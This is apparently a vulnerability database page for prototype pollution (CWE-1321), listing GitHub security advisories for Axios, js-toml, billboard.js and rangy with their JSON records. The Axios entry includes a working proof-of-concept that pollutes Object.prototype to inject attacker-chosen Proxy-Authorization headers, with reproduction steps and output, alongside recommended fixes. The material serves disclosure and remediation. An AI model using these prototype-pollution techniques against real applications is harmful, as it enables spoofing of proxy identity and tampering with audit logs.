Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

780 vulnerabilities reference this CWE, most recent first.

GHSA-654M-C8P4-X5FP

Vulnerability from github – Published: 2026-05-29 15:51 – Updated: 2026-06-12 19:24
VLAI
Summary
Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix
Details

[Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix in Axios 1.15.2

Summary

The Object.create(null) fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the top-level config object from prototype pollution. However, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain.

The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request.

Severity: Medium (CVSS 5.4) Affected Versions: 1.15.2 (and potentially 1.15.1) Vulnerable Component: lib/adapters/http.js (setProxy()) + lib/utils.js (merge())

CWE

  • CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
  • CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CVSS 3.1

Score: 5.6 (Medium)

Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Metric Value Justification
Attack Vector Network PP triggered remotely via vulnerable dependency
Attack Complexity High Requires two preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure config.proxy. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally
Privileges Required None No authentication needed
User Interaction None No user interaction required
Scope Unchanged Within the proxy authentication context
Confidentiality Low Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike config.baseURL hijack)
Integrity Low Proxy-Authorization header injected; proxy may apply different access policies based on injected identity
Availability Low If proxy rejects the injected credentials, legitimate requests may fail

Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)

Factor GHSA-q8qp-cvcw-x6jj This Finding
Precondition None — all requests affected Must have config.proxy set
config.baseURL PP Hijacks all relative URL requests Not applicable
config.auth PP Injects Authorization to target server Only injects Proxy-Authorization to proxy
Attacker sees traffic Yes (via baseURL redirect) No — only proxy identity affected
Impact scope Universal — every axios request Only requests with explicit proxy config

This Is a Patch Bypass

This vulnerability bypasses the fix introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses Object.create(null) for the config object, blocking direct prototype pollution on config.proxy, config.auth, etc.

However, the fix is incomplete: when a user legitimately sets config.proxy = { host: 'proxy.corp', port: 8080 }, the mergeConfig() function passes this object through utils.merge(), which creates a new plain {} object (lib/utils.js:406: const result = {};). This new object inherits from Object.prototype, re-opening the prototype pollution attack surface on the nested proxy object.

Layer Protection Status
config (top-level) Object.create(null) ✓ Fixed
config.proxy (nested) utils.merge()const result = {} ✗ NOT Fixed
setProxy() reads proxy.username, proxy.auth without hasOwnProperty ✗ NOT Fixed

Root Cause Analysis

Step 1: utils.merge() creates plain {} for nested objects

File: lib/utils.js, line 406

function merge(/* obj1, obj2, obj3, ... */) {
  const result = {};  // ← Plain object with Object.prototype!
  // ...
}

When mergeConfig() processes config.proxy, getMergedValue() calls utils.merge(), which creates a plain {} for the nested object. This plain object inherits from Object.prototype.

Step 2: setProxy() reads proxy properties without hasOwnProperty

File: lib/adapters/http.js, lines 209-223

function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    if (proxy.username) {                    // ← traverses Object.prototype!
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (proxy.auth) {                        // ← traverses Object.prototype!
      const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);
      if (validProxyAuth) {
        proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');
      }
      // ...
      const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');
      options.headers['Proxy-Authorization'] = 'Basic ' + base64;  // ← INJECTED!
    }
    // ...
  }
}

Complete Attack Chain

Object.prototype.username = 'attacker'
Object.prototype.password = 'stolen-creds'
         │
         ▼
  User config: { proxy: { host: 'proxy.corp', port: 8080 } }
         │
         ▼
  mergeConfig() → utils.merge() → new plain {}
  config.proxy = { host: 'proxy.corp', port: 8080 }  (own properties)
  config.proxy inherits from Object.prototype         (has .username, .password)
         │
         ▼
  setProxy() at http.js:209:
    proxy.username → 'attacker' (from Object.prototype) → truthy!
    proxy.auth = 'attacker' + ':' + 'stolen-creds'
         │
         ▼
  http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Injected into EVERY proxied HTTP request!

Proof of Concept

import http from 'http';
import axios from './index.js';

// Proxy server logs received Proxy-Authorization
const proxyServer = http.createServer((req, res) => {
  console.log('Proxy-Authorization:', req.headers['proxy-authorization']);
  res.writeHead(200);
  res.end('OK');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Target server
const target = http.createServer((req, res) => { res.writeHead(200); res.end(); });
await new Promise(r => target.listen(0, r));

// Simulate prototype pollution from vulnerable dependency
Object.prototype.username = 'attacker';
Object.prototype.password = 'stolen-creds';

// Developer sets proxy WITHOUT auth — expects no auth header
await axios.get(`http://127.0.0.1:${target.address().port}/api`, {
  proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },
});

// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
// Decoded: attacker:stolen-creds

delete Object.prototype.username;
delete Object.prototype.password;
proxyServer.close();
target.close();

Reproduction Environment

Axios version: 1.15.2 (latest patched release)
Node.js version: v20.20.2
OS: macOS Darwin 25.4.0

Reproduction Steps

# 1. Install axios 1.15.2
npm pack axios@1.15.2
tar xzf axios-1.15.2.tgz && mv package axios-1.15.2
cd axios-1.15.2 && npm install

# 2. Save PoC as poc.mjs (code from Section 7 above)

# 3. Run
node poc.mjs

Verified PoC Output

=== Axios 1.15.2: PP → Proxy-Authorization Injection ===

[1] Normal request with proxy (no auth):
  Proxy-Authorization: none

[2] Prototype Pollution: Object.prototype.username = "attacker"
  Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Decoded: attacker:stolen-creds
  → PP injected proxy credentials: attacker:stolen-creds

[3] Impact:
  ✗ Attacker injects Proxy-Authorization into all proxied requests
  ✗ If proxy logs auth, attacker credential appears in proxy logs
  ✗ If proxy authenticates based on this, attacker controls proxy identity
  ✗ Works on 1.15.2 despite null-prototype config fix
  ✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype

Confirming the Bypass Mechanism

Direct PP (config.proxy) — BLOCKED by 1.15.2:
  Object.prototype.proxy = { host: 'evil' }
  config.proxy = undefined            ← null-prototype blocks ✓

Nested PP (proxy.username) — BYPASSES 1.15.2:
  Object.prototype.username = 'attacker'
  config.proxy = { host: 'legit', port: 8080 }  ← user-set, own properties
  config.proxy own keys: ['host', 'port']        ← username NOT own
  config.proxy.username = 'attacker'             ← inherited from Object.prototype!
  hasOwn(config.proxy, 'username') = false

## Impact Analysis

- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.
- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record "attacker" instead of the real user, enabling audit trail manipulation.
- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.
- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth — a common pattern in corporate environments.

### Prerequisite

- Application must use `config.proxy` (explicit proxy configuration)
- A separate prototype pollution vulnerability must exist in the dependency tree
- `Object.prototype.username` or `Object.prototype.auth` must be polluted

## Recommended Fix

### Fix 1: Use `hasOwnProperty` in `setProxy()`

```javascript
function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

    if (hasOwn(proxy, 'username')) {
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (hasOwn(proxy, 'auth')) {
      // ... existing auth handling ...
    }
  }
}

Fix 2: Use null-prototype objects in utils.merge()

// lib/utils.js line 406
function merge(/* obj1, obj2, obj3, ... */) {
  const result = Object.create(null);  // ← null-prototype for nested objects too
  // ...
}

Fix 3 (Comprehensive): Apply null-prototype to all objects created by getMergedValue()

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.15.2"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.15.2"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T15:51:02Z",
    "nvd_published_at": "2026-06-11T17:16:32Z",
    "severity": "LOW"
  },
  "details": "# [Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution \u2014 Incomplete Null-Prototype Fix in Axios 1.15.2\n\n## Summary\n\nThe `Object.create(null)` fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the **top-level config object** from prototype pollution. However, **nested objects** created by `utils.merge()` (e.g., `config.proxy`) are still constructed as plain `{}` with `Object.prototype` in their chain.\n\nThe `setProxy()` function at `lib/adapters/http.js:209-223` reads `proxy.username`, `proxy.password`, and `proxy.auth` **without `hasOwnProperty` checks**. When `Object.prototype.username` is polluted, `setProxy()` constructs a `Proxy-Authorization` header with attacker-controlled credentials and injects it into **every proxied HTTP request**.\n\n**Severity:** Medium (CVSS 5.4)\n**Affected Versions:** 1.15.2 (and potentially 1.15.1)\n**Vulnerable Component:** `lib/adapters/http.js` (`setProxy()`) + `lib/utils.js` (`merge()`)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\n- **CWE-113:** Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Response Splitting\u0027)\n\n## CVSS 3.1\n\n**Score: 5.6 (Medium)**\n\nVector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP triggered remotely via vulnerable dependency |\n| Attack Complexity | **High** | Requires **two** preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure `config.proxy`. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | Within the proxy authentication context |\n| Confidentiality | **Low** | Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike `config.baseURL` hijack) |\n| Integrity | **Low** | Proxy-Authorization header injected; proxy may apply different access policies based on injected identity |\n| Availability | **Low** | If proxy rejects the injected credentials, legitimate requests may fail |\n\n### Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)\n\n| Factor | GHSA-q8qp-cvcw-x6jj | This Finding |\n|---|---|---|\n| Precondition | **None** \u2014 all requests affected | Must have `config.proxy` set |\n| `config.baseURL` PP | Hijacks **all** relative URL requests | Not applicable |\n| `config.auth` PP | Injects `Authorization` to **target server** | Only injects `Proxy-Authorization` to **proxy** |\n| Attacker sees traffic | Yes (via baseURL redirect) | **No** \u2014 only proxy identity affected |\n| Impact scope | Universal \u2014 every axios request | Only requests with explicit proxy config |\n\n## This Is a Patch Bypass\n\nThis vulnerability **bypasses the fix** introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses `Object.create(null)` for the config object, blocking direct prototype pollution on `config.proxy`, `config.auth`, etc.\n\nHowever, the fix is **incomplete**: when a user legitimately sets `config.proxy = { host: \u0027proxy.corp\u0027, port: 8080 }`, the `mergeConfig()` function passes this object through `utils.merge()`, which creates a **new plain `{}` object** (`lib/utils.js:406: const result = {};`). This new object inherits from `Object.prototype`, re-opening the prototype pollution attack surface on the **nested** proxy object.\n\n| Layer | Protection | Status |\n|---|---|---|\n| `config` (top-level) | `Object.create(null)` | \u2713 Fixed |\n| `config.proxy` (nested) | `utils.merge()` \u2192 `const result = {}` | **\u2717 NOT Fixed** |\n| `setProxy()` reads | `proxy.username`, `proxy.auth` without `hasOwnProperty` | **\u2717 NOT Fixed** |\n\n## Root Cause Analysis\n\n### Step 1: `utils.merge()` creates plain `{}` for nested objects\n\n**File:** `lib/utils.js`, line 406\n\n```javascript\nfunction merge(/* obj1, obj2, obj3, ... */) {\n  const result = {};  // \u2190 Plain object with Object.prototype!\n  // ...\n}\n```\n\nWhen `mergeConfig()` processes `config.proxy`, `getMergedValue()` calls `utils.merge()`, which creates a plain `{}` for the nested object. This plain object inherits from `Object.prototype`.\n\n### Step 2: `setProxy()` reads proxy properties without `hasOwnProperty`\n\n**File:** `lib/adapters/http.js`, lines 209-223\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n  let proxy = configProxy;\n  // ...\n  if (proxy) {\n    if (proxy.username) {                    // \u2190 traverses Object.prototype!\n      proxy.auth = (proxy.username || \u0027\u0027) + \u0027:\u0027 + (proxy.password || \u0027\u0027);\n    }\n\n    if (proxy.auth) {                        // \u2190 traverses Object.prototype!\n      const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);\n      if (validProxyAuth) {\n        proxy.auth = (proxy.auth.username || \u0027\u0027) + \u0027:\u0027 + (proxy.auth.password || \u0027\u0027);\n      }\n      // ...\n      const base64 = Buffer.from(proxy.auth, \u0027utf8\u0027).toString(\u0027base64\u0027);\n      options.headers[\u0027Proxy-Authorization\u0027] = \u0027Basic \u0027 + base64;  // \u2190 INJECTED!\n    }\n    // ...\n  }\n}\n```\n\n### Complete Attack Chain\n\n```\nObject.prototype.username = \u0027attacker\u0027\nObject.prototype.password = \u0027stolen-creds\u0027\n         \u2502\n         \u25bc\n  User config: { proxy: { host: \u0027proxy.corp\u0027, port: 8080 } }\n         \u2502\n         \u25bc\n  mergeConfig() \u2192 utils.merge() \u2192 new plain {}\n  config.proxy = { host: \u0027proxy.corp\u0027, port: 8080 }  (own properties)\n  config.proxy inherits from Object.prototype         (has .username, .password)\n         \u2502\n         \u25bc\n  setProxy() at http.js:209:\n    proxy.username \u2192 \u0027attacker\u0027 (from Object.prototype) \u2192 truthy!\n    proxy.auth = \u0027attacker\u0027 + \u0027:\u0027 + \u0027stolen-creds\u0027\n         \u2502\n         \u25bc\n  http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n  Injected into EVERY proxied HTTP request!\n```\n\n## Proof of Concept\n\n```javascript\nimport http from \u0027http\u0027;\nimport axios from \u0027./index.js\u0027;\n\n// Proxy server logs received Proxy-Authorization\nconst proxyServer = http.createServer((req, res) =\u003e {\n  console.log(\u0027Proxy-Authorization:\u0027, req.headers[\u0027proxy-authorization\u0027]);\n  res.writeHead(200);\n  res.end(\u0027OK\u0027);\n});\nawait new Promise(r =\u003e proxyServer.listen(0, r));\nconst proxyPort = proxyServer.address().port;\n\n// Target server\nconst target = http.createServer((req, res) =\u003e { res.writeHead(200); res.end(); });\nawait new Promise(r =\u003e target.listen(0, r));\n\n// Simulate prototype pollution from vulnerable dependency\nObject.prototype.username = \u0027attacker\u0027;\nObject.prototype.password = \u0027stolen-creds\u0027;\n\n// Developer sets proxy WITHOUT auth \u2014 expects no auth header\nawait axios.get(`http://127.0.0.1:${target.address().port}/api`, {\n  proxy: { host: \u0027127.0.0.1\u0027, port: proxyPort, protocol: \u0027http\u0027 },\n});\n\n// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n// Decoded: attacker:stolen-creds\n\ndelete Object.prototype.username;\ndelete Object.prototype.password;\nproxyServer.close();\ntarget.close();\n```\n\n## Reproduction Environment\n\n```\nAxios version: 1.15.2 (latest patched release)\nNode.js version: v20.20.2\nOS: macOS Darwin 25.4.0\n```\n\n## Reproduction Steps\n\n```bash\n# 1. Install axios 1.15.2\nnpm pack axios@1.15.2\ntar xzf axios-1.15.2.tgz \u0026\u0026 mv package axios-1.15.2\ncd axios-1.15.2 \u0026\u0026 npm install\n\n# 2. Save PoC as poc.mjs (code from Section 7 above)\n\n# 3. Run\nnode poc.mjs\n```\n\n## Verified PoC Output\n\n```\n=== Axios 1.15.2: PP \u2192 Proxy-Authorization Injection ===\n\n[1] Normal request with proxy (no auth):\n  Proxy-Authorization: none\n\n[2] Prototype Pollution: Object.prototype.username = \"attacker\"\n  Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz\n  Decoded: attacker:stolen-creds\n  \u2192 PP injected proxy credentials: attacker:stolen-creds\n\n[3] Impact:\n  \u2717 Attacker injects Proxy-Authorization into all proxied requests\n  \u2717 If proxy logs auth, attacker credential appears in proxy logs\n  \u2717 If proxy authenticates based on this, attacker controls proxy identity\n  \u2717 Works on 1.15.2 despite null-prototype config fix\n  \u2717 Root cause: proxy object is plain {} from utils.merge, NOT null-prototype\n```\n\n### Confirming the Bypass Mechanism\n\n```\nDirect PP (config.proxy) \u2014 BLOCKED by 1.15.2:\n  Object.prototype.proxy = { host: \u0027evil\u0027 }\n  config.proxy = undefined            \u2190 null-prototype blocks \u2713\n\nNested PP (proxy.username) \u2014 BYPASSES 1.15.2:\n  Object.prototype.username = \u0027attacker\u0027\n  config.proxy = { host: \u0027legit\u0027, port: 8080 }  \u2190 user-set, own properties\n  config.proxy own keys: [\u0027host\u0027, \u0027port\u0027]        \u2190 username NOT own\n  config.proxy.username = \u0027attacker\u0027             \u2190 inherited from Object.prototype!\n  hasOwn(config.proxy, \u0027username\u0027) = false\n```\n```\n\n## Impact Analysis\n\n- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.\n- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record \"attacker\" instead of the real user, enabling audit trail manipulation.\n- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker\u0027s credentials propagate through the proxy chain.\n- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth \u2014 a common pattern in corporate environments.\n\n### Prerequisite\n\n- Application must use `config.proxy` (explicit proxy configuration)\n- A separate prototype pollution vulnerability must exist in the dependency tree\n- `Object.prototype.username` or `Object.prototype.auth` must be polluted\n\n## Recommended Fix\n\n### Fix 1: Use `hasOwnProperty` in `setProxy()`\n\n```javascript\nfunction setProxy(options, configProxy, location) {\n  let proxy = configProxy;\n  // ...\n  if (proxy) {\n    const hasOwn = (obj, key) =\u003e Object.prototype.hasOwnProperty.call(obj, key);\n\n    if (hasOwn(proxy, \u0027username\u0027)) {\n      proxy.auth = (proxy.username || \u0027\u0027) + \u0027:\u0027 + (proxy.password || \u0027\u0027);\n    }\n\n    if (hasOwn(proxy, \u0027auth\u0027)) {\n      // ... existing auth handling ...\n    }\n  }\n}\n```\n\n### Fix 2: Use null-prototype objects in `utils.merge()`\n\n```javascript\n// lib/utils.js line 406\nfunction merge(/* obj1, obj2, obj3, ... */) {\n  const result = Object.create(null);  // \u2190 null-prototype for nested objects too\n  // ...\n}\n```\n\n### Fix 3 (Comprehensive): Apply null-prototype to all objects created by `getMergedValue()`\n\n## References\n\n- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)\n- [GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)](https://github.com/advisories/GHSA-q8qp-cvcw-x6jj)\n- [GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)\n- [Axios GitHub Repository](https://github.com/axios/axios)",
  "id": "GHSA-654m-c8p4-x5fp",
  "modified": "2026-06-12T19:24:58Z",
  "published": "2026-05-29T15:51:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44489"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution \u2014 Incomplete Null-Prototype Fix"
}

GHSA-65FC-CR5F-V7R2

Vulnerability from github – Published: 2025-08-04 16:07 – Updated: 2025-08-05 17:11
VLAI
Summary
js-toml Prototype Pollution Vulnerability
Details

A prototype pollution vulnerability in js-toml allows a remote attacker to add or modify properties of the global Object.prototype by parsing a maliciously crafted TOML input.

Impact

The js-toml library is vulnerable to Prototype Pollution. When parsing a TOML string containing the specially crafted key __proto__, an attacker can add or modify properties on the global Object.prototype.

While the js-toml library itself does not contain known vulnerable "gadgets", this can lead to severe security vulnerabilities in applications that use the library. For example, if the consuming application checks for the existence of a property for authorization purposes (e.g., user.isAdmin), this vulnerability could be escalated to an authentication bypass. Other potential impacts in the application include Denial of Service (DoS) or, in some cases, Remote Code Execution (RCE), depending on the application's logic and dependencies.

Any application that uses an affected version of js-toml to parse untrusted input is vulnerable. The severity of the impact, ranging from unexpected behavior to a full security compromise, is dependent on the application's specific code and its handling of object properties.

Patches

This vulnerability has been patched in version 1.0.2.

All users are advised to upgrade to version 1.0.2 or later to mitigate this issue. Users of all prior versions are affected.

Workarounds

If you are unable to upgrade to a patched version, the only mitigation is to ensure that any TOML input being passed to the js-toml library is from a fully trusted source and has been validated to not contain malicious keys.

References

  • This vulnerability was discovered and responsibly disclosed by siunam.

  • The Proof-of-Concept can be found at this Gist: https://gist.github.com/siunam321/f3dc4d21a5a932c67b6c11d0026f5afc

  • For more information on Prototype Pollution, see PortSwigger's explanation: https://portswigger.net/web-security/prototype-pollution

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "js-toml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-04T16:07:05Z",
    "nvd_published_at": "2025-08-05T01:15:42Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution vulnerability in `js-toml` allows a remote attacker to add or modify properties of the global `Object.prototype` by parsing a maliciously crafted TOML input.\n\n### Impact\n\nThe `js-toml` library is vulnerable to Prototype Pollution. When parsing a TOML string containing the specially crafted key `__proto__`, an attacker can add or modify properties on the global `Object.prototype`.\n\nWhile the `js-toml` library itself does not contain known vulnerable \"gadgets\", this can lead to severe security vulnerabilities in applications that use the library. For example, if the consuming application checks for the existence of a property for authorization purposes (e.g., `user.isAdmin`), this vulnerability could be escalated to an authentication bypass. Other potential impacts in the application include Denial of Service (DoS) or, in some cases, Remote Code Execution (RCE), depending on the application\u0027s logic and dependencies.\n\nAny application that uses an affected version of `js-toml` to parse untrusted input is vulnerable. The severity of the impact, ranging from unexpected behavior to a full security compromise, is dependent on the application\u0027s specific code and its handling of object properties.\n\n### Patches\n\nThis vulnerability has been patched in version `1.0.2`.\n\nAll users are advised to upgrade to version `1.0.2` or later to mitigate this issue. Users of all prior versions are affected.\n\n### Workarounds\n\nIf you are unable to upgrade to a patched version, the only mitigation is to ensure that any TOML input being passed to the `js-toml` library is from a fully trusted source and has been validated to not contain malicious keys.\n\n### References\n\n- This vulnerability was discovered and responsibly disclosed by [siunam](https://github.com/siunam321).\n\n* The Proof-of-Concept can be found at this Gist: https://gist.github.com/siunam321/f3dc4d21a5a932c67b6c11d0026f5afc\n\n- For more information on Prototype Pollution, see PortSwigger\u0027s explanation: https://portswigger.net/web-security/prototype-pollution",
  "id": "GHSA-65fc-cr5f-v7r2",
  "modified": "2025-08-05T17:11:05Z",
  "published": "2025-08-04T16:07:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sunnyadn/js-toml/security/advisories/GHSA-65fc-cr5f-v7r2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54803"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sunnyadn/js-toml/commit/b125910a3f094b744c9c3571360d4b9e3a472f66"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/siunam321/f3dc4d21a5a932c67b6c11d0026f5afc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sunnyadn/js-toml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "js-toml Prototype Pollution Vulnerability"
}

GHSA-65P9-J6PG-72HJ

Vulnerability from github – Published: 2025-06-04 03:30 – Updated: 2025-07-29 21:42
VLAI
Summary
billboard.js allows prototype pollution via the function generate
Details

billboard.js before 3.15.1 was discovered to contain a prototype pollution via the function generate, which could allow attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "billboard.js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-49223"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-29T21:42:33Z",
    "nvd_published_at": "2025-06-04T03:15:27Z",
    "severity": "CRITICAL"
  },
  "details": "billboard.js before 3.15.1 was discovered to contain a prototype pollution via the function generate, which could allow attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
  "id": "GHSA-65p9-j6pg-72hj",
  "modified": "2025-07-29T21:42:33Z",
  "published": "2025-06-04T03:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49223"
    },
    {
      "type": "WEB",
      "url": "https://github.com/naver/billboard.js/commit/82ea7ac4f5720d6a7f0c2fa5a5dad51a549667bb"
    },
    {
      "type": "WEB",
      "url": "https://cve.naver.com/detail/cve-2025-49223.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louay-075/CVE-2025-49223-BillboardJS-PoC"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/naver/billboard.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/naver/billboard.js/blob/938f263feca453fba5a4dc48d86b32cc5b509443/src/core.ts#L95"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "billboard.js allows prototype pollution via the function generate"
}

GHSA-65RP-MHQF-8GJ3

Vulnerability from github – Published: 2023-02-24 06:30 – Updated: 2023-03-03 00:12
VLAI
Summary
rangy vulnerable to Prototype Pollution
Details

All versions of the package rangy are vulnerable to Prototype Pollution when using the extend() function in file rangy-core.js.The function uses recursive merge which can lead an attacker to modify properties of the Object.prototype.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "rangy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26102"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-24T16:23:36Z",
    "nvd_published_at": "2023-02-24T05:15:00Z",
    "severity": "HIGH"
  },
  "details": "All versions of the package rangy are vulnerable to Prototype Pollution when using the `extend()` function in file `rangy-core.js`.The function uses recursive merge which can lead an attacker to modify properties of the Object.prototype.",
  "id": "GHSA-65rp-mhqf-8gj3",
  "modified": "2023-03-03T00:12:19Z",
  "published": "2023-02-24T06:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26102"
    },
    {
      "type": "WEB",
      "url": "https://github.com/timdown/rangy/issues/478"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/timdown/rangy"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-RANGY-3175702"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "rangy vulnerable to Prototype Pollution"
}

GHSA-66RH-8FW6-59Q6
